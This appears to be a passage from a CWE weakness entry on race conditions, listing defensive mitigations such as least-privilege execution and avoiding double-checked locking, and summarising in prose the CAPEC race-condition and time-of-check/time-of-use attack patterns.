Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization.
Mitigation
Disable interrupts or signals over critical parts of the code, but also make sure that the code does not go into a large or infinite loop.
Mitigation
Use the volatile type modifier for critical variables to avoid unexpected compiler optimization or reordering. This does not necessarily solve the synchronization problem, but it can help.
Mitigation MIT-17
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
CAPEC-26: Leveraging Race Conditions
The adversary targets a race condition occurring when multiple processes access and manipulate the same resource concurrently, and the outcome of the execution depends on the particular order in which the access takes place. The adversary can leverage a race condition by "running the race", modifying the resource and modifying the normal execution flow. For instance, a race condition can occur while accessing a file: the adversary can trick the system by replacing the original file with their version and cause the system to read the malicious file.
CAPEC-29: Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions
This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by "running the race", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.